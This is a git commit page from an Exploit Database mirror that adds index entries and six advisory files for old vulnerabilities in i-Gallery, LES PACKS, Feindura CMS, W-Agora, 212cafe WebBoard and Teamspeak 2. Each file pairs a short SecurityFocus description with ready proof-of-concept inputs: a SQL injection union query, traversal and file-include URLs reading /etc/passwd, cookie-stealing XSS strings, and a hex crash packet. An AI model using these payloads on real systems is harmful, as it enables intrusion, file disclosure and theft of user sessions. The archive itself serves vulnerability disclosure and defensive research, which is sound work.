Updated 10_13_2014
This commit is contained in:
Offensive Security
parent
174997aa11
commit
60e5c6c2a0
7 changed files with 87 additions and 0 deletions
|
|
@ -31456,3 +31456,9 @@ id,file,description,date,author,platform,type,port
|
|||
34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution Vulnerability",2010-10-26,s_n,linux,remote,0
|
||||
34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 Multiple Cross Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0
|
||||
34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Include Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0
|
||||
34935,platforms/php/webapps/34935.txt,"LES PACKS 'ID' Parameter SQL Injection Vulnerability",2010-10-27,Cru3l.b0y,php,webapps,0
|
||||
34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0
|
||||
34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware Multiple Local File Include and Cross Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0
|
||||
34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption Vulnerability",2010-10-28,"Jokaim and nSense",windows,dos,0
|
||||
34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 Local File Include and Cross Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0
|
||||
34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta 'view.php' Directory Traversal Vulnerability",2009-05-29,MrDoug,php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
9
platforms/asp/webapps/34936.txt
Executable file
9
platforms/asp/webapps/34936.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/44467/info
|
||||
|
||||
i-Gallery is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to download and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks.
|
||||
|
||||
i-Gallery 3.4 and 4.1 are vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/igallery41/streamfile.asp?i=./../../../index.asp&f=subdir
|
||||
7
platforms/php/webapps/34935.txt
Executable file
7
platforms/php/webapps/34935.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/44457/info
|
||||
|
||||
LES PACKS is prone to an SQL-injection vulnerability.
|
||||
|
||||
An attacker can exploit this SQL-injection issue to carry out unauthorized actions on the underlying database, which may compromise the application and aid in further attacks.
|
||||
|
||||
http://www.example.com/index.php?Page=articles&ID=-1+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15
|
||||
21
platforms/php/webapps/34937.txt
Executable file
21
platforms/php/webapps/34937.txt
Executable file
|
|
@ -0,0 +1,21 @@
|
|||
source: http://www.securityfocus.com/bid/44501/info
|
||||
|
||||
Feindura CMS is prone to multiple local file-include vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
|
||||
|
||||
The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Feindura CMS versions 1.0rc and prior are vulnerable.
|
||||
|
||||
Local file Include:
|
||||
|
||||
http://www.example.com/[path]/library/process/download.php?filename=[path/to/file]
|
||||
|
||||
http://www.example.com/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
|
||||
|
||||
http://www.example.com/[path]/?language=../../../../../../../etc/passwd%00
|
||||
|
||||
Cross Site Scripting:
|
||||
|
||||
http://www.example.com/[path]/library/sites/editor.php?category=[XSS]
|
||||
20
platforms/php/webapps/34939.txt
Executable file
20
platforms/php/webapps/34939.txt
Executable file
|
|
@ -0,0 +1,20 @@
|
|||
source: http://www.securityfocus.com/bid/44507/info
|
||||
|
||||
W-Agora is prone to multiple local file-include vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these vulnerabilities to view and execute local files within the context of the webserver process or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
W-Agora 4.1.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
|
||||
http://www.example.com/news/for-print.php3?bn=x&key=1282850719%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
||||
http://www.example.com/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
|
||||
http://www.example.com/news/login.php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
||||
http://www.example.com/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
|
||||
'conf' folder:
|
||||
http://www.example.com/news/for-print.php3?bn=1
|
||||
http://www.example.com/news/login.php3?bn=1
|
||||
|
||||
Any folder (only on Windows-servers):
|
||||
http://www.example.com/news/for-print.php3?bn=..\1
|
||||
http://www.example.com/news/login.php3?bn=..\1
|
||||
10
platforms/php/webapps/34940.txt
Executable file
10
platforms/php/webapps/34940.txt
Executable file
|
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/44510/info
|
||||
|
||||
212cafe WebBoard is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to retrieve and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks.
|
||||
|
||||
212cafe WebBoard 2.90 beta is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/webboard/view.php?topic=../../../../../../etc/passwd%00
|
||||
http://www.example.com/webboard/view.php?topic=../../../../../../WINDOWS/system32/eula
|
||||
14
platforms/windows/dos/34938.txt
Executable file
14
platforms/windows/dos/34938.txt
Executable file
|
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/44502/info
|
||||
|
||||
Teamspeak is prone to a memory-corruption vulnerability.
|
||||
|
||||
Attackers can exploit this issue by sending a specially crafted voice transmission packet containing malicious data.
|
||||
|
||||
Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.
|
||||
|
||||
Teamspeak version 2.0.32.60 is vulnerable.
|
||||
|
||||
The following proof-of-concept packet is available:
|
||||
f2be000426ad7e00300000000001000a414141414141414141424141414141
|
||||
4141414141414141414141414141414141414100ff99414141424242424141
|
||||
414141414141414141
|
||||
Loading…
Add table
Reference in a new issue